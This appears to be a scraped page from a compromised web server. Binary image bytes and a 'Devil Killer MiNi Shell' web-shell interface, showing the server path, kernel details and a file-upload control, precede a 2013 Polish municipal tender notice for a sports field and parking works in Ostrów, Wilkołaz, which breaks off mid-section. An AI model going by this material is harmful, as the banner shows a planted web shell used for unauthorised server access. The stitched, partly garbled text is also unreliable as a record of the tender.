JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130201/44532-N-2013.html

<p class="kh_header"><b>Wilkołaz Pierwszy: Budowa boiska  wielofunkcyjnego, parkingu na 10 stanowisk dla samochodów osobowych wraz z chodnikiem oraz remont istniejącego parkingu  w  miejscowości Ostrów gm. Wilkołaz</b><br>
<b>Numer ogłoszenia: 44532 - 2013; data zamieszczenia: 01.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wilkołaz , 9, 23-212 Wilkołaz Pierwszy, woj. lubelskie, tel. 081 8212001, 8212035, faks 081 8212695.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> gmina@wilkolaz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa boiska  wielofunkcyjnego, parkingu na 10 stanowisk dla samochodów osobowych wraz z chodnikiem oraz remont istniejącego parkingu  w  miejscowości Ostrów gm. Wilkołaz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót:
Budowa boiska  wielofunkcyjnego, parkingu na 10 stanowisk dla samochodów osobowych wraz z chodnikiem oraz remont istniejącego parkingu  w  miejscowości Ostrów gm. Wilkołaz.   
Przewiduje się  budowę boiska  wielofunkcyjnego o nawierzchni 
sportowej poliuretanowej na podbudowie z kruszywa łamanego. Nawierzchnie sportowe 
zostaną ułożone ze spadkiem dwustronnym 0,5%. Na płycie boiska zostaną namalowane 
niezbędne linie poszczególnych pól boisk - boisko do gry w siatkówkę, koszykówkę, piłkę 
ręczną (w ograniczonym zakresie) oraz do gry w piłkę nożną (w ograniczonym zakresie) 
W obrębie boiska zaplanowano budowę fundamentów pod urządzenia sportowe 
(demontowalne na czas zimowy) - dwa stojaki dwu-słupowe do koszykówki, dwa słupy 
wielofunkcyjne do siatkówki, dwie bramki do piłki ręcznej. Głębokość posadowienia 
fundamentów 1,00m poniżej terenu boiska. Położenie boiska wyznaczono na terenie 
pozbawionym sieci i instalacji, co nie wymaga uzgodnień z poszczególnymi dostawcami 
sieci. Boisko od strony szkoły zostanie wyposażone w piłkochwyt z siatki plecionej stalowej 
powlekanej PCV na konstrukcji nośnej ze słupków stalowych powlekanych PCV. Wysokość 
ogrodzenia 400cm. Słupki zostaną utwierdzone w fundamentach betonowych wykonywanych  na miejscu budowy. 

Ponadto zaplanowano dojścia do boiska od strony szkoły oraz dojścia do parkingu 
oraz do głównego wyjścia z działki. Nawierzchnie zaprojektowano z kostki betonowej pełnej 
oraz częściowo w obrębie parkingów z kostki hydroprzepuszczalnej, kostka układana na 
podbudowie z kruszywa łamanego. Pomiędzy boiskiem, a budynkiem szkoły wyznaczono 
plac spotkań, na którym ustawiono maszt flagowy. Układ chodników zostanie dopełniony 
elementami małej architektury tj. ławki i kosze. 

Przewiduje się  rozbudowę istniejącego parkingu zlokalizowanego wzdłuż 
asfaltowej drogi dojazdowej do szkoły. Obecnie znajduje się 9 miejsc parkingowych 
utwardzonych oraz 8 miejsc gruntowych. Przewiduje się wymianę istniejącej nawierzchni 
parkingów z płyt chodnikowych i kruszywa łamanego na utwardzenie ekologiczne z płyt 
ażurowych. Dodatkowo planuje się budowę nowych 9 miejsc parkingowych i miejsca dla 
rowerów i motorowerów o takiej samej nawierzchni. W obrębie planowanych parkingów 
należy przewidzieć usunięcie korzeni wyciętych drzew. Stan drogi asfaltowej dojazdowej do 
szkoły w obrębie działki nr 59 wymusza wykonanie remontu nawierzchni. Proponuje się 
wykonanie nowej warstwy asfaltu na istniejącej drodze. 

W obrębie planowanych nowych miejsc parkingowych należy przewidzieć korektę 
przebiegu linii skarpy na granicy działki nr 58 i 59. Przewiduje się składowanie ziemi z 
wykopów pod boisko oraz chodników jako umocnienie skarpy. Utwardzenie skarpy pod 
miejsca parkingowe wyłącznie z podbudowy nośnej, np. gruz betonowy pozostały z 
nawierzchni parkingów. 

Nie przewiduje  się żadnych zmian w istniejących obiektach kubaturowych, planowana 
inwestycja opiera się na budowie boiska , dojść i placu w formie chodników, 
remontu istniejących miejsc parkingowych i remontu istniejącej drogi asfaltowej oraz budowie nowych miejsc parkingowych (10 msc. parkingowych w tym 2 dla osób niepełnosprawnych). 
 
 
ZESTAWIENIE POWIERZCHNI POSZCZEGÓLNYCH CZĘŚCI 
ZAGOSPODAROWANIA TERENU 

POWIERZCHNIA DZIAŁKI nr 58 i 59    - 0,786 ha

POWIERZCHNIA ISTNIEJĄCEJ ZABUDOWY  - 751 m2

POWIERZCHNIA ISTNIEJĄCEJ NAWIERZCHNI UTWARDZONEJ - 
DOJŚCIA I DOJAZDY  - 595 m2

POWIERZCHNIA ISTNIEJĄCEGO PARKINGU DLA SAMOCHODÓW 
OSOBOWYCH O NAWIERZCHNI UTWARDZONEJ  - 160 m2 

PROJEKTOWANA POWIERZCHNIA NAWIERZCHNI UTWARDZONEJ 
SZCZELNEJ - CHODNIKI I PLAC SPOTKAŃ - 774 m2

PROJEKTOWANEJ POWIERZCHNIA NAWIERZCHNI UTWARDZONEJ 
HYDROPRZEPUSZCZALNEJ - PARKINGI I DOJAZDY 
(50% pow. biologicznie czynnej)  - 4645 m2

POWIERZCHNIA NAWIERZCHNI PROJEKTOWANEJ SPORTOWEJ  - 608 m2
TERENY ZIELONE  - 5263 m2

Roboty towarzyszące oraz tymczasowe nie objęte dokumentacją projektową i przedmiarem robót konieczne do uwzględnienia:
            a) organizacja i zagospodarowanie placu budowy wraz z zapleczem budowy ,
	b) zabezpieczenie terenu przed dostępem osób trzecich,
	c) wykonanie robót tymczasowych,
            d) nadzór nad mieniem,
            e)  wybudowanie, utrzymanie i likwidację objazdów/przejazdów i organizacji ruchu na czas trwania budowy,
            f) utrzymanie porządku w trakcie prowadzenia robót oraz uporządkowanie po zakończeniu robót,
	g) natychmiastowe docelowe i skuteczne usunięcie wszelkich szkód i awarii spowodowanych przez wykonawcę w trakcie realizacji robót,
           h) opracowanie i przekazanie zamawiającemu dokumentacji odbiorowej,
           i) wykonanie inwentaryzacji  geodezyjnej powykonawczej,
           j) czynny udział w odbiorach,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje możliwość udzielenia zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju zamówień w wysokości do 50% wartości zamówienia. Zamówienie uzupełniające może być udzielone w okresie 3 lat od daty udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.11.27.20-8, 45.23.31.00-0, 45.22.31.10-0, 45.21.22.21-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości: 8,500.00 PLN (słownie: osiem tysięcy pięćset złotych 00/100 PLN)
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego:
BS Ziemi  Kraśnickiej Oddział Wilkołaz 41871710352002200001430004
z dopiskiem na blankiecie przelewu - wadium na  Budowę boiska  wielofunkcyjnego, parkingu na 10 stanowisk dla samochodów osobowych wraz z chodnikiem oraz remont istniejącego parkingu  w  miejscowości Ostrów gm. Wilkołaz.   

Wadium wniesione w innej formie niż w pieniądzu należy złożyć w formie oryginału razem z ofertą w osobnej kopercie. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób czytelny umożliwiający identyfikację (np. złożony wraz z imienną pieczątką lub czytelny z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać nieodwołalne i bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Pzp.
4.	Wadium musi zostać wniesione przed upływem terminu składania ofert. Oferta niezabezpieczona akceptowaną formą wadium zostanie odrzucona.
5.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo Zamówień Publicznych.
6.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
7.	Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo Zamówień Publicznych, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
9.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. 
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo Zamówień Publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne - zgodne w swej treści z wzorem określonym w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	wykaz wykonanych co najmniej dwóch robót budowlanych   polegających na wykonaniu boisk sportowych o nawierzchni sztucznej o wartości nie mniejszej niż 150.000,00 zł każda   z podaniem ich rodzaju i wartości, daty i miejsca wykonania  wraz załączeniem  dokumentów potwierdzających,  że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone  - załącznik  nr 4 do siwz,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, które będą uczestniczyć w realizacji zamówienia, a w szczególności osoby odpowiedzialne za kierowanie robotami posiadającymi uprawnienia z zakresu kierowania robotami  drogowymi - załącznik nr 5 do siwz,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek potwierdzająca, że wykonawca  posiada środki finansowe lub zdolność kredytową w  kwocie nie mniejszej niż 150.000,00 zł., - wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli wykonawca, wykazując spełnienie warunków dotyczących sytuacji ekonomicznej i finansowej, polegać będzie na zdolnościach finansowych innych podmiotów to zobowiązany jest do przedstawienia powyższej informacji dotyczącej tych podmiotów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje  możliwość dokonania zmian postanowień umowy - zgodnie z art. 144 ust. 1 ustawy Prawo Zamówień Publicznych, za zgodą obu stron.
2.	Możliwość wprowadzenia istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:

2.1 Wydłużenie terminu wykonania zamówienia, spowodowanego wystąpieniem niekorzystnych 
            warunków pogodowych nie pozwalających na wykonywanie prac zgodnie z wymogami 
           określonymi w Specyfikacji Technicznej Wykonania i Odbioru Robót, np.  długotrwałe, 
           intensywne opady deszczu, długotrwałe niskie temperatury, powodzie lub wystąpienia innych 
           obiektywnych okoliczności  niezależnych od Wykonawcy.
 2.2. W uzasadnionych przypadkach ( np. choroba, nieplanowany urlop itp.) dopuszcza się zmiany 
           postanowień umowy dotyczące powierzenia wykonania przedmiotu zamówienia innym osobom 
           niż wskazane w ofercie na osoby o porównywalnych kwalifikacjach i doświadczeniu zawodowym 
           jakie  wymagał  Zamawiający lub wyższych.
  2.3 Konieczność wprowadzenia zmian będzie następstwem zmian prawnych lub zmian 
           wprowadzonych w umowie pomiędzy  Zamawiającym a inna niż Wykonawca stroną, w tym 
           instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie.
   2.4  W przypadku przekształcenia podmiotowego Wykonawcy.
   2.5  W przypadku zmiany  Podwykonawcy. Jeżeli  jednak Wykonawca opierał się na zasobach 
            podmiotu trzeciego ( wspomnianego  Podwykonawcy) wykazując spełnienie warunków udziału w 
          postępowaniu zmiana Podwykonawcy  może nastąpić na taki, który wykaże spełnienie warunków 
          w zakresie nie mniejszym niż podmiot ( Podwykonawca) wskazany na etapie postepowania o 
          udzielenie zamówienia publicznego.
   2.6  Zmiana postanowień umowy w związku z zaistnieniem okoliczności powodującej, że wykonanie 
          części  lub całości  przedmiotu umowy nie leży w interesie publicznym.
    2.7 W przypadku gdy wykonanie umowy nie leży w interesie publicznym wynagrodzenie 
           przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie 
          spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z 
          wynikającymi z umowy planowanymi świadczeniami.
    2.8 Zmian osobowych osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne 
           legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo 
           budowlane,
